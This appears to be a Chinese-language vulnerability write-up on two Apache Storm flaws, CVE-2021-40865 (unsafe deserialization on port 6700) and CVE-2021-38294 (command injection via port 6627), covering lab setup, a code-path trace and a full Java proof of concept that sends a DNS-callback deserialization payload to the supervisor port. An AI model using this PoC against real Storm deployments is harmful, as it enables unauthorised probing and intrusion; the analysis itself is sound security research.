警告
本文最后更新于 2021-11-01,文中内容可能已过时。
看到GitHub的安全实验室又出了两篇漏洞分析,我就看一下。
- GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor - CVE-2021-40865
- GHSL-2021-085:Apache Storm Nimbus 中的命令注入 - CVE-2021-38294
搭环境非常恶心,需要zookeeper和storm,并且需要在Linux上,因为CVE-2021-38294命令注入只在Linux上有。
下载链接:
- https://dlcdn.apache.org/zookeeper/zookeeper-3.7.0/apache-zookeeper-3.7.0-bin.tar.gz
- https://apache.mirror.iphh.net/storm/apache-storm-2.2.0/apache-storm-2.2.0.zip
zookeeper启动
1
2
| cp zookeeper/conf/zoo_sample.cfg zookeeper/conf/zoo.cfg
./bin/zkServer.sh start
|
storm配置,注释掉以下几行,并修改为自己的ip
1
2
3
4
| storm.zookeeper.servers:
- "192.168.137.138"
nimbus.seeds : ["192.168.137.138"]
ui.port: 8081
|
然后先启动zookeeper以后启动storm
1
2
3
4
| cd storm/bin
python3 storm.py nimbus
python3 storm.py supervisor
python3 storm.py ui
|
然后8081端口就是ui的web服务

然后需要添加计算作业Topology
创建一个maven项目,修改pom文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| <?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.example</groupId>
<artifactId>stormJob</artifactId>
<version>1.0-SNAPSHOT</version>
<properties>
<maven.compiler.source>8</maven.compiler.source>
<maven.compiler.target>8</maven.compiler.target>
</properties>
<dependencies>
<dependency>
<groupId>org.apache.storm</groupId>
<artifactId>storm-core</artifactId>
<version>2.2.0</version>
</dependency>
</dependencies>
</project>
|
创建sum.ClusterSumStormTopology类
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
| package sum;
import java.util.Map;
import org.apache.storm.Config;
import org.apache.storm.StormSubmitter;
import org.apache.storm.generated.AlreadyAliveException;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.generated.InvalidTopologyException;
import org.apache.storm.spout.SpoutOutputCollector;
import org.apache.storm.task.OutputCollector;
import org.apache.storm.task.TopologyContext;
import org.apache.storm.topology.OutputFieldsDeclarer;
import org.apache.storm.topology.TopologyBuilder;
import org.apache.storm.topology.base.BaseRichBolt;
import org.apache.storm.topology.base.BaseRichSpout;
import org.apache.storm.tuple.Fields;
import org.apache.storm.tuple.Tuple;
import org.apache.storm.tuple.Values;
import org.apache.storm.utils.Utils;
public class ClusterSumStormTopology {
/**
* Spout需要继承BaseRichSpout
* 产生数据并且发送出去
* */
public static class DataSourceSpout extends BaseRichSpout{
private SpoutOutputCollector collector;
/**
* 初始化方法,在执行前只会被调用一次
* @param conf 配置参数
* @param context 上下文
* @param collector 数据发射器
* */
public void open(Map conf, TopologyContext context, SpoutOutputCollector collector) {
this.collector = collector;
}
int number = 0;
/**
* 产生数据,生产上一般是从消息队列中获取数据
* */
public void nextTuple() {
this.collector.emit(new Values(++number));
System.out.println("spout发出:"+number);
Utils.sleep(1000);
}
/**
* 声明输出字段
* @param declarer
* */
public void declareOutputFields(OutputFieldsDeclarer declarer) {
/**
* num是上nextTuple中emit中的new Values对应的。上面发几个,这里就要定义几个字段。
* 在bolt中获取的时候,只需要获取num这个字段就行了。
* */
declarer.declare(new Fields("num"));
}
}
/**
* 数据的累计求和Bolt
* 接收数据并且处理
* */
public static class SumBolt extends BaseRichBolt{
/**
* 初始化方法,只会被执行一次
* */
public void prepare(Map stormConf, TopologyContext context, OutputCollector collector) {
}
int sum=0;
/**
* 获取spout发送过来的数据
* */
public void execute(Tuple input) {
//这里的num就是在spout中的declareOutputFields定义的字段名
//可以根据index获取,也可以根据上一个环节中定义的名称获取
Integer value = input.getIntegerByField("num");
sum+=value;
System.out.println("Bolt:sum="+sum);
}
/**
* 声明输出字段
* @param declarer
* */
public void declareOutputFields(OutputFieldsDeclarer declarer) {
}
}
public static void main (String[] args){
//TopologyBuilder根据spout和bolt来构建Topology
//storm中任何一个作业都是通过Topology方式进行提交的
//Topology中需要指定spout和bolt的执行顺序
TopologyBuilder tb = new TopologyBuilder();
tb.setSpout("DataSourceSpout", new DataSourceSpout());
//SumBolt以随机分组的方式从DataSourceSpout中接收数据
tb.setBolt("SumBolt", new SumBolt()).shuffleGrouping("DataSourceSpout");
//代码提交到storm集群上运行
try {
StormSubmitter.submitTopology("ClusterSumStormTopology", new Config(), tb.createTopology());
} catch (AlreadyAliveException e) {
e.printStackTrace();
} catch (InvalidTopologyException e) {
e.printStackTrace();
} catch (AuthorizationException e) {
e.printStackTrace();
}
}
}
|
然后maven打jar包传到storm机器上。
然后运行
1
2
| python3 storm.py jar /home/ubuntu/stormJob-1.0-SNAPSHOT.jar sum.ClusterSumStormTopology
python3 storm.py list
|
list之后可以看到任务在运行才算成功。

原因在于6700端口对于数据的处理先进行了反序列化,然后才校验身份验证。
org.apache.storm.messaging.netty.StormServerPipelineFactory

按顺序注册
- MessageDecoder
- SaslStormServerHandler
- SaslStormServerAuthorizeHandler
- StormServerHandler
MessageDecoder重写了decode方法,对传入数据进行解码。
然后从buf中读一个Short值,当等于-600时,进入BackPressureStatus.read(bytes, this.deser)

然后进行KryoValuesDeserializer.deserializeObject(byte)

其中KryoValuesDeserializer是StormServerPipelineFactory传入的new KryoValuesDeserializer(this.topoConf))

其中SerializationFactory.getKryo(conf)
从序列化工厂中取出反序列化对象

通过conf.get(“topology.kryo.factory”)取出传入conf中的反序列化工厂,poc中构造的为org.apache.storm.serialization.DefaultKryoFactory
,取出工厂类之后,进一步调用DefaultKryoFactory.getKryo(conf)

20行这里返回了一个KryoSerializableDefault()实例。
这里需要注意44行当this.override为true时,会返回一个new SerializableSerializer()
。它直接调用ObjectInputStream进行序列化和反序列化

那么this.override何时为true呢?

当调用了DefaultKryoFactory的postRegister()时会返回一个由ObjectInputStream进行序列化和反序列化的类。

然后org/apache/storm/serialization/SerializationFactory.class:92
这个地方调用postRegister(),所以达到反序列化任意对象的效果。
poc如下
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
| package com.test;
import org.apache.storm.serialization.KryoValuesSerializer;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.OutputStream;
import java.lang.reflect.Field;
import java.math.BigInteger;
import java.net.*;
import java.util.HashMap;
public class Main {
public static byte[] buffer(KryoValuesSerializer ser, Object obj) throws IOException {
byte[] payload = ser.serializeObject(obj);
BigInteger codeInt = BigInteger.valueOf(-600);
byte[] code = codeInt.toByteArray();
BigInteger lengthInt = BigInteger.valueOf(payload.length);
byte[] length = lengthInt.toByteArray();
ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
outputStream.write(code);
outputStream.write(new byte[]{0, 0});
outputStream.write(length);
outputStream.write(payload);
return outputStream.toByteArray();
}
public static KryoValuesSerializer getSerializer() throws MalformedURLException {
HashMap<String, Object> conf = new HashMap<>();
conf.put("topology.kryo.factory", "org.apache.storm.serialization.DefaultKryoFactory");
conf.put("topology.tuple.serializer", "org.apache.storm.serialization.types.ListDelegateSerializer");
conf.put("topology.skip.missing.kryo.registrations", false);
conf.put("topology.fall.back.on.java.serialization", true);
return new KryoValuesSerializer(conf);
}
public static void main(String[] args) {
try {
// Payload construction
URLStreamHandler handler = new SilentURLStreamHandler();
String url = "http://aqa13.dnslog.cn";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
Field hashCode = u.getClass().getDeclaredField("hashCode");
hashCode.setAccessible(true);
hashCode.set(u, -1);
// Kryo serialization
byte[] bytes = buffer(getSerializer(), ht);
// Send bytes
Socket socket = new Socket("192.168.137.138", 6700);
OutputStream outputStream = socket.getOutputStream();
outputStream.write(bytes);
outputStream.flush();
outputStream.close();
} catch (Exception e) {
e.printStackTrace();
}
}
static class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
}
|
RCE的话没找到gadget http://noahblog.360.cn/apache-storm-vulnerability-analysis/ 写的是错的
命令注入,端口 6627 上公开了许多服务,可以未授权链接调用

user参数传入isUserPartOf()

继续传递到this.groupMapper.getGroups(user)

继续传递

拼接参数执行命令造成命令注入。
文笔垃圾,措辞轻浮,内容浅显,操作生疏。不足之处欢迎大师傅们指点和纠正,感激不尽。